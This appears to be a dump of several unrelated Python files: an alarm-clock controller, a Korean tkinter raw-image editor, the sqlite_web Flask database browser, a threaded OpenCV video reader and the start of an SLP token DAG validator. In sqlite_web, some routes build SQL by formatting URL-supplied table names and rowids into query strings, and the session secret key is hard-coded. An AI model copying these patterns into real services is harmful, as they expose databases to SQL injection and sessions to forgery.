display : The python wrapper object for the display (hardware)
inspbutton : The python wrapper for the "inspirational messages" button
setalarmbutton: "" for the "set alarm" button
onoffbutton : "" for the button that can turn the alarm on and off
'''
self.speaker = speaker
self.display = display
self.inspbutton = inspbutton
self.setalarmbutton = setalarmbutton
self.onoffbutton = onoffbutton
def main(self,):
''' Starts all the major alarm clock processes. '''
# Check time for alarm sounding
self.startTimeChecking()
def startTimeChecking(self,):
'''
Starts a time checking polling thread. Upon the system time being
determined to be true, starts the alarm sound by pulling a random
audio file from the morning_msgs.
'''
th = threading.Thread(target=self.timeCheckingWorker)
th.start()
def timeCheckingWorker(self,):
'''
Starts a time checking polling thread. Upon the system time being
determined to be true, starts the alarm sound by pulling a random
audio file from the morning_msgs.
'''
while True:
# Polling loop
isTime = self.checkTime()
isNotEditing = not self.display.isEditing()
if isTime and isNotEditing:
# Loop only does anything when we want the alarm to do something
if self.onoffbutton.checkIsOn():
# Actually starts the audio
self.speaker.playMorningAlarm()
# Waits five seconds before polling again
time.sleep(5)
def getCurrSystemTime(self,):
'''
Gets the current system time, expressed as a list of four
integers (hours:minuts).
'''
currTime = datetime.datetime.now()
currHr = currTime.hour
currMin = currTime.minute
time = [math.floor(currHr/10),currHr % 10,math.floor(currMin/10),currMin % 10]
#print(time)
return time
def checkTime(self,):
'''
Checks if current system/online time matches the display timer. Returns
True if it matches or if the the alarmTime is before the current time
and after the self.lastCheckedTime.
OUTER CONTEXT: This function needs to be periodically called to function
appropriately.
TODO: Test transition from one 24-hour day to the next.
'''
def checkIfTimeIsLessThan(time,valueToCompareTo):
'''
Checks if the given time input is less than the
valueToCompareTo, given the [int,int,int,int] formatting
of time.
'''
for ind in range(len(time)):
if time[ind] < valueToCompareTo[ind]:
return True
if time[ind] > valueToCompareTo[ind]:
return False
return False
# Gets the current time and the alarm clock time
currSystemTime = self.getCurrSystemTime()
self.display.updateCurrentTime(currSystemTime) # update the display with the current time
alarmTime = self.setalarmbutton.getAlarmTime()
# Compares them and outputs message
isTime = (alarmTime == currSystemTime) or \
(checkIfTimeIsLessThan(alarmTime,currSystemTime)
and checkIfTimeIsLessThan(self.lastCheckedTime,alarmTime))
self.lastCheckedTime = currSystemTime
return isTime
if __name__ == '__main__':
# Initiate and run
speaker = Speaker({'LEFT':32,'RIGHT':33})
display = Display({'NIGHTLIGHT':37,'DC':22,'RST':36,'BACKLIGHT':16})
inspButton = InspirationalButton(speaker,12)
setAlarmButton = SetAlarmButton(display,{'MID':10,'UP':29,'DOWN':31,'LEFT':7,'RIGHT':15})
onOffButton = OnOffSwitch(35)
alarmClock = AlarmClock(speaker,display,inspButton,setAlarmButton,onOffButton)
alarmClock.main()
#display.updateAlarmTime([0,2,0,6]) # TESTING
#display.screen.close() # TODO: Figure out the code and put this in a better spot
|
analy_GUI_ver0.01.py
|
## 영상 처리 및 데이터 분석 툴
from tkinter import *; import os.path ;import math
from tkinter.filedialog import *
from tkinter.simpledialog import *
## 함수 선언부
def loadImage(fname) :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
fsize = os.path.getsize(fname) # 파일 크기 확인
inH = inW = int(math.sqrt(fsize)) # 입력메모리 크기 결정! (중요)
inImage = []; tmpList = []
for i in range(inH) : # 입력메모리 확보(0으로 초기화)
tmpList = []
for k in range(inW) :
tmpList.append(0)
inImage.append(tmpList)
# 파일 --> 메모리로 데이터 로딩
fp = open(fname, 'rb') # 파일 열기(바이너리 모드)
for i in range(inH) :
for k in range(inW) :
inImage[i][k] = int(ord(fp.read(1)))
fp.close()
def openFile() :
global window, canvas, paper, filename,inImage, outImage,inW, inH, outW, outH
filename = askopenfilename(parent=window,
filetypes=(("RAW파일", "*.raw"), ("모든파일", "*.*")))
loadImage(filename) # 파일 --> 입력메모리
equal() # 입력메모리--> 출력메모리
import threading
def display() :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
# 기존에 캐버스 있으면 뜯어내기.
if canvas != None :
canvas.destroy()
# 화면 준비 (고정됨)
window.geometry(str(outH) + 'x' + str(outW))
canvas = Canvas(window, width=outW, height=outH)
paper = PhotoImage(width=outW, height=outH)
canvas.create_image((outW/2, outH/2), image=paper, state='normal')
# 화면에 출력
def putPixel() :
for i in range(0, outH) :
for k in range(0, outW) :
data = outImage[i][k]
paper.put('#%02x%02x%02x' % (data, data, data), (k,i))
threading.Thread(target=putPixel).start()
canvas.pack()
def equal() : # 동일 영상 알고리즘
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
# 중요! 출력메모리의 크기를 결정
outW = inW; outH = inH;
outImage = []; tmpList = []
for i in range(outH): # 출력메모리 확보(0으로 초기화)
tmpList = []
for k in range(outW):
tmpList.append(0)
outImage.append(tmpList)
#############################
# 진짜 영상처리 알고리즘을 구현
############################
for i in range(inH) :
for k in range(inW) :
outImage[i][k] = inImage[i][k]
display()
def addImage() : # 밝게하기 알고리즘
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
# 중요! 출력메모리의 크기를 결정
outW = inW; outH = inH;
outImage = []; tmpList = []
for i in range(outH): # 출력메모리 확보(0으로 초기화)
tmpList = []
for k in range(outW):
tmpList.append(0)
outImage.append(tmpList)
#############################
# 진짜 영상처리 알고리즘을 구현
############################
value = askinteger('밝게하기', '밝게할 값-->', minvalue=1, maxvalue=255)
for i in range(inH) :
for k in range(inW) :
if inImage[i][k] + value > 255 :
outImage[i][k] = 255
else :
outImage[i][k] = inImage[i][k] + value
display()
def a_average() : # 입출력 영상의 평균값
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
rawSum = 0
for i in range(inH) :
for k in range(inW) :
rawSum += inImage[i][k]
inRawAvg = int(rawSum / (inH*inW))
rawSum = 0
for i in range(outH) :
for k in range(outW) :
rawSum += outImage[i][k]
outRawAvg = int(rawSum / (outH*outW))
subWindow = Toplevel(window) # 부모(window)에 종속된 서브윈도
subWindow.geometry('200x100')
label1 = Label(subWindow, text='입력영상 평균값 -->' + str(inRawAvg) ); label1.pack()
label2 = Label(subWindow, text='출력영상 평균값 -->' + str(outRawAvg)); label2.pack()
subWindow.mainloop()
def upDown() : # 상하 반전 알고리즘
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
# 중요! 출력메모리의 크기를 결정
outW = inW; outH = inH;
outImage = []; tmpList = []
for i in range(outH): # 출력메모리 확보(0으로 초기화)
tmpList = []
for k in range(outW):
tmpList.append(0)
outImage.append(tmpList)
#############################
# 진짜 영상처리 알고리즘을 구현
############################
for i in range(inH) :
for k in range(inW) :
outImage[outW-1-i][k] = inImage[i][k]
display()
def panImage() :
global panYN
panYN = True
def mouseClick(event) : # 동일 영상 알고리즘
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
global sx, sy, ex, ey, panYN
if not panYN :
return
sx = event.x; sy = event.y;
def mouseDrop(event): # 동일 영상 알고리즘
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
global sx, sy, ex, ey, panYN
if not panYN:
return
ex = event.x; ey = event.y;
my = sx - ex ; mx = sy - ey
# 중요! 출력메모리의 크기를 결정
outW = inW; outH = inH;
outImage = []; tmpList = []
for i in range(outH): # 출력메모리 확보(0으로 초기화)
tmpList = []
for k in range(outW):
tmpList.append(0)
outImage.append(tmpList)
#############################
# 진짜 영상처리 알고리즘을 구현
############################
for i in range(inH) :
for k in range(inW) :
if 0<= i-mx <outH and 0<= k-my < outW :
outImage[i-mx][k-my] = inImage[i][k]
panYN = False
display()
def zoomOut() : # 축소하기 알고리즘
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
# 중요! 출력메모리의 크기를 결정
scale = askinteger('축소하기', '축소할 배수-->', minvalue=2, maxvalue=32)
outW = int(inW/scale); outH = int(inH/scale);
outImage = []; tmpList = []
for i in range(outH): # 출력메모리 확보(0으로 초기화)
tmpList = []
for k in range(outW):
tmpList.append(0)
outImage.append(tmpList)
#############################
# 진짜 영상처리 알고리즘을 구현
############################
for i in range(inH) :
for k in range(inW) :
outImage[int(i/scale)][int(k/scale)] = inImage[i][k]
display()
import struct
def saveFile() :
global window, canvas, paper, filename,inImage, outImage,inW, inH, outW, outH
saveFp = asksaveasfile(parent=window, mode='wb',
defaultextension="*.raw", filetypes=(("RAW파일", "*.raw"), ("모든파일", "*.*")))
for i in range(outW):
for k in range(outH):
saveFp.write( struct.pack('B',outImage[i][k]))
saveFp.close()
def exitFile() :
global window, canvas, paper, filename,inImage, outImage,inW, inH, outW, outH
pass
## 전역 변수부
window, canvas, paper, filename = [None] * 4
inImage, outImage = [], []; inW, inH, outW, outH = [0] * 4
panYN = False; sx, sy, ex, ey = [0] * 4
## 메인 코드부
window = Tk(); window.geometry('200x200');
window.title('영상 처리&데이터 분석 Ver 0.3')
window.bind("<Button-1>", mouseClick)
window.bind("<ButtonRelease-1>", mouseDrop)
mainMenu = Menu(window);window.config(menu=mainMenu)
fileMenu = Menu(mainMenu);mainMenu.add_cascade(label='파일', menu=fileMenu)
fileMenu.add_command(label='열기', command=openFile)
fileMenu.add_command(label='저장', command=saveFile)
fileMenu.add_separator()
fileMenu.add_command(label='종료', command=exitFile)
pixelMenu = Menu(mainMenu);mainMenu.add_cascade(label='화소점처리', menu=pixelMenu)
pixelMenu.add_command(label='동일영상', command=equal)
pixelMenu.add_command(label='밝게하기', command=addImage)
geoMenu = Menu(mainMenu);mainMenu.add_cascade(label='기하학 처리', menu=geoMenu)
geoMenu.add_command(label='상하반전', command=upDown)
geoMenu.add_command(label='화면이동', command=panImage)
geoMenu.add_command(label='화면축소', command=zoomOut)
analyzeMenu = Menu(mainMenu);mainMenu.add_cascade(label='데이터분석', menu=analyzeMenu)
analyzeMenu.add_command(label='평균값', command=a_average)
window.mainloop()
|
sqlite_web.py
|
#!/usr/bin/env python
import operator
import datetime
import math
import optparse
import os
import re
import sys
import threading
import time
import webbrowser
from collections import namedtuple, OrderedDict
from functools import wraps
from getpass import getpass
# Py3k compat.
if sys.version_info[0] == 3:
binary_types = (bytes, bytearray)
decode_handler = 'backslashreplace'
numeric = (int, float)
unicode_type = str
from io import StringIO
else:
binary_types = (buffer, bytes, bytearray)
decode_handler = 'replace'
numeric = (int, long, float)
unicode_type = unicode
from StringIO import StringIO
try:
from flask import (
Flask, abort, escape, flash, jsonify, make_response, Markup, redirect,
render_template, request, session, url_for)
except ImportError:
raise RuntimeError('Unable to import flask module. Install by running '
'pip install flask')
try:
from pygments import formatters, highlight, lexers
except ImportError:
import warnings
warnings.warn('pygments library not found.', ImportWarning)
syntax_highlight = lambda data: '<pre>%s</pre>' % data
else:
def syntax_highlight(data):
if not data:
return ''
lexer = lexers.get_lexer_by_name('sql')
formatter = formatters.HtmlFormatter(linenos=False)
return highlight(data, lexer, formatter)
try:
from peewee import __version__
peewee_version = tuple([int(p) for p in __version__.split('.')])
except ImportError:
raise RuntimeError('Unable to import peewee module. Install by running '
'pip install peewee')
else:
if peewee_version <= (3, 0, 0):
raise RuntimeError('Peewee >= 3.0.0 is required. Found version %s. '
'Please update by running pip install --update '
'peewee' % __version__)
from peewee import *
from peewee import IndexMetadata
from peewee import OperationalError
from playhouse.dataset import DataSet, Table
from playhouse.migrate import migrate
from sqlite_web.utils import get_fields_for_columns
CUR_DIR = os.path.realpath(os.path.dirname(__file__))
DEBUG = False
MAX_RESULT_SIZE = 1000
ROWS_PER_PAGE = 50
SECRET_KEY = 'sqlite-database-browser-0.1.0'
app = Flask(
__name__,
template_folder=os.path.join(CUR_DIR, 'templates'),
static_folder=os.path.join(CUR_DIR, 'static'),
)
app.config.from_object(__name__)
dataset = None
migrator = None
#
# Database metadata objects.
#
TriggerMetadata = namedtuple('TriggerMetadata', ('name', 'sql'))
ViewMetadata = namedtuple('ViewMetadata', ('name', 'sql'))
#
# Database helpers.
#
class SqliteDataSet(DataSet):
@property
def filename(self):
return os.path.realpath(dataset._database.database)
@property
def base_name(self):
return os.path.basename(self.filename)
@property
def created(self):
stat = os.stat(self.filename)
return datetime.datetime.fromtimestamp(stat.st_ctime)
@property
def modified(self):
stat = os.stat(self.filename)
return datetime.datetime.fromtimestamp(stat.st_mtime)
@property
def size_on_disk(self):
stat = os.stat(self.filename)
return stat.st_size
def get_indexes(self, table):
return dataset._database.get_indexes(table)
def get_all_indexes(self):
cursor = self.query(
'SELECT name, sql FROM sqlite_master '
'WHERE type = ? ORDER BY name',
('index',))
return [IndexMetadata(row[0], row[1], None, None, None)
for row in cursor.fetchall()]
def get_columns(self, table):
return dataset._database.get_columns(table)
def get_foreign_keys(self, table):
return dataset._database.get_foreign_keys(table)
def get_triggers(self, table):
cursor = self.query(
'SELECT name, sql FROM sqlite_master '
'WHERE type = ? AND tbl_name = ?',
('trigger', table))
return [TriggerMetadata(*row) for row in cursor.fetchall()]
def get_all_triggers(self):
cursor = self.query(
'SELECT name, sql FROM sqlite_master '
'WHERE type = ? ORDER BY name',
('trigger',))
return [TriggerMetadata(*row) for row in cursor.fetchall()]
def get_all_views(self):
cursor = self.query(
'SELECT name, sql FROM sqlite_master '
'WHERE type = ? ORDER BY name',
('view',))
return [ViewMetadata(*row) for row in cursor.fetchall()]
def get_virtual_tables(self):
cursor = self.query(
'SELECT name FROM sqlite_master '
'WHERE type = ? AND sql LIKE ? '
'ORDER BY name',
('table', 'CREATE VIRTUAL TABLE%'))
return set([row[0] for row in cursor.fetchall()])
def get_corollary_virtual_tables(self):
virtual_tables = self.get_virtual_tables()
suffixes = ['content', 'docsize', 'segdir', 'segments', 'stat']
return set(
'%s_%s' % (virtual_table, suffix) for suffix in suffixes
for virtual_table in virtual_tables)
#
# Flask views.
#
@app.route('/')
def index():
return render_template('index.html')
@app.route('/login/', methods=['GET', 'POST'])
def login():
if request.method == 'POST':
if request.form.get('password') == app.config['PASSWORD']:
session['authorized'] = True
return redirect(session.get('next_url') or '/')
flash('The password you entered is incorrect.', 'danger')
return render_template('login.html')
@app.route('/logout/', methods=['GET'])
def logout():
session.pop('authorized', None)
return redirect(url_for('login'))
def require_table(fn):
@wraps(fn)
def inner(table, *args, **kwargs):
if table not in dataset.tables:
abort(404)
return fn(table, *args, **kwargs)
return inner
@app.route('/create-table/', methods=['POST'])
def table_create():
table = (request.form.get('table_name') or '').strip()
if not table:
flash('Table name is required.', 'danger')
return redirect(request.form.get('redirect') or url_for('index'))
dataset[table]
return redirect(url_for('table_import', table=table))
@app.route('/<table>/')
@require_table
def table_structure(table):
ds_table = dataset[table]
model_class = ds_table.model_class
table_sql = dataset.query(
'SELECT sql FROM sqlite_master WHERE tbl_name = ? AND type = ?',
[table, 'table']).fetchone()[0]
return render_template(
'table_structure.html',
columns=dataset.get_columns(table),
ds_table=ds_table,
foreign_keys=dataset.get_foreign_keys(table),
indexes=dataset.get_indexes(table),
model_class=model_class,
table=table,
table_sql=table_sql,
triggers=dataset.get_triggers(table))
def get_request_data():
if request.method == 'POST':
return request.form
return request.args
@app.route('/<table>/add-column/', methods=['GET', 'POST'])
@require_table
def add_column(table):
column_mapping = OrderedDict((
('VARCHAR', CharField),
('TEXT', TextField),
('INTEGER', IntegerField),
('REAL', FloatField),
('BOOL', BooleanField),
('BLOB', BlobField),
('DATETIME', DateTimeField),
('DATE', DateField),
('TIME', TimeField),
('DECIMAL', DecimalField)))
request_data = get_request_data()
col_type = request_data.get('type')
name = request_data.get('name', '')
if request.method == 'POST':
if name and col_type in column_mapping:
migrate(
migrator.add_column(
table,
name,
column_mapping[col_type](null=True)))
flash('Column "%s" was added successfully!' % name, 'success')
dataset.update_cache(table)
return redirect(url_for('table_structure', table=table))
else:
flash('Name and column type are required.', 'danger')
return render_template(
'add_column.html',
col_type=col_type,
column_mapping=column_mapping,
name=name,
table=table)
@app.route('/<table>/drop-column/', methods=['GET', 'POST'])
@require_table
def drop_column(table):
request_data = get_request_data()
name = request_data.get('name', '')
columns = dataset.get_columns(table)
column_names = [column.name for column in columns]
if request.method == 'POST':
if name in column_names:
migrate(migrator.drop_column(table, name))
flash('Column "%s" was dropped successfully!' % name, 'success')
dataset.update_cache(table)
return redirect(url_for('table_structure', table=table))
else:
flash('Name is required.', 'danger')
return render_template(
'drop_column.html',
columns=columns,
column_names=column_names,
name=name,
table=table)
@app.route('/<table>/rename-column/', methods=['GET', 'POST'])
@require_table
def rename_column(table):
request_data = get_request_data()
rename = request_data.get('rename', '')
rename_to = request_data.get('rename_to', '')
columns = dataset.get_columns(table)
column_names = [column.name for column in columns]
if request.method == 'POST':
if (rename in column_names) and (rename_to not in column_names):
migrate(migrator.rename_column(table, rename, rename_to))
flash('Column "%s" was renamed successfully!' % rename, 'success')
dataset.update_cache(table)
return redirect(url_for('table_structure', table=table))
else:
flash('Column name is required and cannot conflict with an '
'existing column\'s name.', 'danger')
return render_template(
'rename_column.html',
columns=columns,
column_names=column_names,
rename=rename,
rename_to=rename_to,
table=table)
@app.route('/<table>/add-index/', methods=['GET', 'POST'])
@require_table
def add_index(table):
request_data = get_request_data()
indexed_columns = request_data.getlist('indexed_columns')
unique = bool(request_data.get('unique'))
columns = dataset.get_columns(table)
if request.method == 'POST':
if indexed_columns:
migrate(
migrator.add_index(
table,
indexed_columns,
unique))
flash('Index created successfully.', 'success')
return redirect(url_for('table_structure', table=table))
else:
flash('One or more columns must be selected.', 'danger')
return render_template(
'add_index.html',
columns=columns,
indexed_columns=indexed_columns,
table=table,
unique=unique)
@app.route('/<table>/drop-index/', methods=['GET', 'POST'])
@require_table
def drop_index(table):
request_data = get_request_data()
name = request_data.get('name', '')
indexes = dataset.get_indexes(table)
index_names = [index.name for index in indexes]
if request.method == 'POST':
if name in index_names:
migrate(migrator.drop_index(table, name))
flash('Index "%s" was dropped successfully!' % name, 'success')
return redirect(url_for('table_structure', table=table))
else:
flash('Index name is required.', 'danger')
return render_template(
'drop_index.html',
indexes=indexes,
index_names=index_names,
name=name,
table=table)
@app.route('/<table>/drop-trigger/', methods=['GET', 'POST'])
@require_table
def drop_trigger(table):
request_data = get_request_data()
name = request_data.get('name', '')
triggers = dataset.get_triggers(table)
trigger_names = [trigger.name for trigger in triggers]
if request.method == 'POST':
if name in trigger_names:
dataset.query('DROP TRIGGER "%s";' % name)
flash('Trigger "%s" was dropped successfully!' % name, 'success')
return redirect(url_for('table_structure', table=table))
else:
flash('Trigger name is required.', 'danger')
return render_template(
'drop_trigger.html',
triggers=triggers,
trigger_names=trigger_names,
name=name,
table=table)
@app.route('/<table>/content/')
@require_table
def table_content(table):
page_number = request.args.get('page') or ''
page_number = int(page_number) if page_number.isdigit() else 1
dataset.update_cache(table)
ds_table = dataset[table]
total_rows = ds_table.all().count()
rows_per_page = app.config['ROWS_PER_PAGE']
total_pages = int(math.ceil(total_rows / float(rows_per_page)))
# Restrict bounds.
page_number = min(page_number, total_pages)
page_number = max(page_number, 1)
previous_page = page_number - 1 if page_number > 1 else None
next_page = page_number + 1 if page_number < total_pages else None
query = ds_table.all().paginate(page_number, rows_per_page)
offset = (page_number-1) * rows_per_page
rowid_query_tmpl = (
'SELECT rowid FROM {table} {order_by} LIMIT {limit} OFFSET {offset};'
)
ordering = request.args.get('ordering')
order_by_clause = ''
if ordering:
field = ds_table.model_class._meta.columns[ordering.lstrip('-')]
order_by_clause = 'ORDER BY {field} '.format(field=field.name)
if ordering.startswith('-'):
field = field.desc()
order_by_clause += 'DESC'
else:
order_by_clause += 'ASC'
query = query.order_by(field)
rowid_query = rowid_query_tmpl.format(
table=table,
order_by=order_by_clause,
limit=rows_per_page,
offset=offset,
)
rowids = list(map(operator.itemgetter(0),
dataset.query(rowid_query).fetchall()))
field_names = ds_table.columns
fields = get_fields_for_columns(dataset.get_columns(table))
columns = [f.column_name for f in ds_table.model_class._meta.sorted_fields]
table_sql = dataset.query(
'SELECT sql FROM sqlite_master WHERE tbl_name = ? AND type = ?',
[table, 'table']).fetchone()[0]
return render_template(
'table_content.html',
columns=columns,
ds_table=ds_table,
field_names=field_names,
next_page=next_page,
ordering=ordering,
page=page_number,
previous_page=previous_page,
query=zip(rowids, query),
fields=fields,
table=table,
total_pages=total_pages,
total_rows=total_rows,
)
@app.route('/<table>/get/<rowid>', methods=['GET'])
def item_get(table, rowid):
query = 'SELECT * FROM {table} WHERE rowid = ?'.format(table=table)
cursor = dataset.query(query, [rowid])
return jsonify({'fields': cursor.fetchone()})
@app.route('/<table>/update/<rowid>', methods=['POST'])
@require_table
def item_update(table, rowid):
query_tmpl = ('UPDATE {table} SET {fields_update} '
'WHERE rowid = {rowid}')
fields_update = ', '.join([
'{field} = ?'.format(field=field)
for field, _ in request.form.items()
])
values = [value for _, value in request.form.items()]
query = query_tmpl.format(
table=table,
fields_update=fields_update,
rowid=rowid,
)
try:
cursor = dataset.query(query, values)
except (OperationalError, ) as e:
flash(str(e), category='danger')
return redirect(url_for('table_content', table=table))
@app.route('/<table>/query/', methods=['GET', 'POST'])
@require_table
def table_query(table):
data = []
data_description = error = row_count = sql = None
if request.method == 'POST':
sql = request.form['sql']
if 'export_json' in request.form:
return export(table, sql, 'json')
elif 'export_csv' in request.form:
return export(table, sql, 'csv')
try:
cursor = dataset.query(sql)
except Exception as exc:
error = str(exc)
else:
data = cursor.fetchall()[:app.config['MAX_RESULT_SIZE']]
data_description = cursor.description
row_count = cursor.rowcount
else:
if request.args.get('sql'):
sql = request.args.get('sql')
else:
sql = 'SELECT *\nFROM "%s"' % (table)
table_sql = dataset.query(
'SELECT sql FROM sqlite_master WHERE tbl_name = ? AND type = ?',
[table, 'table']).fetchone()[0]
return render_template(
'table_query.html',
data=data,
data_description=data_description,
error=error,
query_images=get_query_images(),
row_count=row_count,
sql=sql,
table=table,
table_sql=table_sql)
@app.route('/table-definition/', methods=['POST'])
def set_table_definition_preference():
key = 'show'
show = False
if request.form.get(key) and request.form.get(key) != 'false':
session[key] = show = True
elif key in session:
del session[key]
return jsonify({key: show})
@app.route('/<table>/delete/<rowid>', methods=['GET'])
@require_table
def item_delete(table, rowid):
query = 'DELETE FROM {table} WHERE rowid = ?'.format(table=table)
try:
cursor = dataset.query(query, [rowid])
except (OperationalError,) as e:
return jsonify({'error': 1, 'message': str(e)})
return jsonify({'error': 0})
def export(table, sql, export_format):
model_class = dataset[table].model_class
query = model_class.raw(sql).dicts()
buf = StringIO()
if export_format == 'json':
kwargs = {'indent': 2}
filename = '%s-export.json' % table
mimetype = 'text/javascript'
else:
kwargs = {}
filename = '%s-export.csv' % table
mimetype = 'text/csv'
dataset.freeze(query, export_format, file_obj=buf, **kwargs)
response_data = buf.getvalue()
response = make_response(response_data)
response.headers['Content-Length'] = len(response_data)
response.headers['Content-Type'] = mimetype
response.headers['Content-Disposition'] = 'attachment; filename=%s' % (
filename)
response.headers['Expires'] = 0
response.headers['Pragma'] = 'public'
return response
@app.route('/<table>/import/', methods=['GET', 'POST'])
@require_table
def table_import(table):
count = None
request_data = get_request_data()
strict = bool(request_data.get('strict'))
if request.method == 'POST':
file_obj = request.files.get('file')
if not file_obj:
flash('Please select an import file.', 'danger')
elif not file_obj.filename.lower().endswith(('.csv', '.json')):
flash('Unsupported file-type. Must be a .json or .csv file.',
'danger')
else:
if file_obj.filename.lower().endswith('.json'):
format = 'json'
else:
format = 'csv'
try:
with dataset.transaction():
count = dataset.thaw(
table,
format=format,
file_obj=file_obj.stream,
strict=strict)
except Exception as exc:
flash('Error importing file: %s' % exc, 'danger')
else:
flash(
'Successfully imported %s objects from %s.' % (
count, file_obj.filename),
'success')
return redirect(url_for('table_content', table=table))
return render_template(
'table_import.html',
count=count,
strict=strict,
table=table)
@app.route('/<table>/drop/', methods=['GET', 'POST'])
@require_table
def drop_table(table):
if request.method == 'POST':
model_class = dataset[table].model_class
model_class.drop_table()
flash('Table "%s" dropped successfully.' % table, 'success')
return redirect(url_for('index'))
return render_template('drop_table.html', table=table)
@app.template_filter('format_index')
def format_index(index_sql):
split_regex = re.compile(r'\bon\b', re.I)
if not split_regex.search(index_sql):
return index_sql
create, definition = split_regex.split(index_sql)
return '\nON '.join((create.strip(), definition.strip()))
@app.template_filter('value_filter')
def value_filter(value, max_length=50):
if isinstance(value, numeric):
return value
if isinstance(value, binary_types):
if not isinstance(value, (bytes, bytearray)):
value = bytes(value) # Handle `buffer` type.
value = value.decode('utf-8', decode_handler)
if isinstance(value, unicode_type):
value = escape(value)
if len(value) > max_length:
return ('<span class="truncated">%s</span> '
'<span class="full" style="display:none;">%s</span>'
'<a class="toggle-value" href="#">...</a>') % (
value[:max_length],
value)
return value
column_re = re.compile('(.+?)\((.+)\)', re.S)
column_split_re = re.compile(r'(?:[^,(]|\([^)]*\))+')
def _format_create_table(sql):
create_table, column_list = column_re.search(sql).groups()
columns = [' %s' % column.strip()
for column in column_split_re.findall(column_list)
if column.strip()]
return '%s (\n%s\n)' % (
create_table,
',\n'.join(columns))
@app.template_filter()
def format_create_table(sql):
try:
return _format_create_table(sql)
except:
return sql
@app.template_filter('highlight')
def highlight_filter(data):
return Markup(syntax_highlight(data))
def get_query_images():
accum = []
image_dir = os.path.join(app.static_folder, 'img')
if not os.path.exists(image_dir):
return accum
for filename in sorted(os.listdir(image_dir)):
basename = os.path.splitext(os.path.basename(filename))[0]
parts = basename.split('-')
accum.append((parts, 'img/' + filename))
return accum
#
# Flask application helpers.
#
@app.context_processor
def _general():
return {
'dataset': dataset,
'login_required': bool(app.config.get('PASSWORD')),
}
@app.context_processor
def _now():
return {'now': datetime.datetime.now()}
@app.before_request
def _connect_db():
dataset.connect()
@app.teardown_request
def _close_db(exc):
if not dataset._database.is_closed():
dataset.close()
#
# Script options.
#
def get_option_parser():
parser = optparse.OptionParser()
parser.add_option(
'-p',
'--port',
default=8080,
help='Port for web interface, default=8080',
type='int')
parser.add_option(
'-H',
'--host',
default='127.0.0.1',
help='Host for web interface, default=127.0.0.1')
parser.add_option(
'-d',
'--debug',
action='store_true',
help='Run server in debug mode')
parser.add_option(
'-x',
'--no-browser',
action='store_false',
default=True,
dest='browser',
help='Do not automatically open browser page.')
parser.add_option(
'-P',
'--password',
action='store_true',
dest='prompt_password',
help='Prompt for password to access database browser.')
return parser
def die(msg, exit_code=1):
sys.stderr.write('%s\n' % msg)
sys.stderr.flush()
sys.exit(exit_code)
def open_browser_tab(host, port):
url = 'http://%s:%s/' % (host, port)
def _open_tab(url):
time.sleep(1.5)
webbrowser.open_new_tab(url)
thread = threading.Thread(target=_open_tab, args=(url,))
thread.daemon = True
thread.start()
def install_auth_handler(password):
app.config['PASSWORD'] = password
@app.before_request
def check_password():
if not session.get('authorized') and request.path != '/login/' and \
not request.path.startswith(('/static/', '/favicon')):
flash('You must log-in to view the database browser.', 'danger')
session['next_url'] = request.path
return redirect(url_for('login'))
def main():
global dataset
global migrator
# This function exists to act as a console script entry-point.
parser = get_option_parser()
options, args = parser.parse_args()
if not args:
die('Error: missing required path to database file.')
password = None
if options.prompt_password:
while True:
password = getpass('Enter password: ')
password_confirm = getpass('Confirm password: ')
if password != password_confirm:
print('Passwords did not match!')
else:
break
if options.debug:
app.jinja_env.auto_reload = True
app.jinja_env.cache = None
if password:
install_auth_handler(password)
db_file = args[0]
dataset = SqliteDataSet('sqlite:///%s' % db_file, bare_fields=True)
migrator = dataset._migrator
dataset.close()
if options.browser:
open_browser_tab(options.host, options.port)
app.run(host=options.host, port=options.port, debug=options.debug)
if __name__ == '__main__':
main()
|
video_source.py
|
from queue import Queue
from threading import Thread
import cv2
from .. import utils
class VideoSource:
def __init__(
self,
source,
size,
padding,
buffer_size = 100):
self.__source = source
self.__size = size
self.__padding = padding
self.__buffer_size = buffer_size
self.__is_opened = False
self.__buffer = Queue(maxsize = self.__buffer_size)
self.__capture = cv2.VideoCapture(self.__source)
self.__capture.set(cv2.CAP_PROP_FRAME_WIDTH, self.__size[0])
self.__capture.set(cv2.CAP_PROP_FRAME_HEIGHT, self.__size[1])
def __open(self):
self.__is_opened = True
while self.__is_opened:
if not self.__buffer.full():
success, image = self.__capture.read()
if success:
resized_image = utils.resize(
cv2.flip(image, 1),
self.__size,
self.__padding)
self.__buffer.put((resized_image, self.__size))
else:
self.__is_opened = False
def source(self):
return self.__source
def size(self):
return self.__size
def padding(self):
return self.__padding
def buffer_size(self):
return self.__buffer_size
def is_opened(self):
return self.__is_opened
def open(self):
thread = Thread(target = self.__open, daemon = True)
thread.start()
def close(self):
self.__is_opened = False
def read(self):
return self.__buffer.get()
|
slp_dagging.py
|
"""
Breadth-first DAG digger for colored coins.
We do a breadth-first DAG traversal starting with the transaction-of-interest
at the source, and digging into ancestors layer by layer. Along the way we
prune off some connections, invalidate+disconnect branches, etc.,
so our 'search DAG' is a subset of the transaction DAG. To hold this
dynamically changing search DAG, we have a TokenGraph class.
(It's much simpler to run a full node and validate as transactions appear, but
we have no such luxury in a light wallet.)
Threading
=========
The TokenGraph and Node objects are not threadsafe. It is fine however to
have different graphs/nodes being worked on by different threads (see
slp_validator_0x01).
"""
import sys
import threading
import queue
import traceback
import weakref
import collections
from abc import ABC, abstractmethod
from .transaction import Transaction
from .util import PrintError
INF_DEPTH=2147483646 # 'infinity' value for node depths. 2**31 - 2
from . import slp_graph_search # thread doesn't start until instantiation, one thread per search job, w/ shared txn cache
class hardref:
# a proper reference that mimics weakref interface
__slots__ = ('_obj')
def __init__(self,obj):
self._obj = obj
def __call__(self,):
return self._obj
class DoubleLoadException(Exception):
pass
class ValidatorGeneric(ABC):
"""
The specific colored coin implementation will need to make a 'validator'
object according to this template.
Implementations should:
- Define `get_info`, `check_needed`, and `validate` methods.
- Define `validity_states` dictionary.
- Set `prevalidation` to one of the following:
False - only call validate() once per tx, when all inputs are concluded.
True - call validate() repeatedly, starting when all inputs are downloaded.
(only useful if this can provide early validity conclusions)
"""
prevalidation = False
validity_states = {
0: 'Unknown',
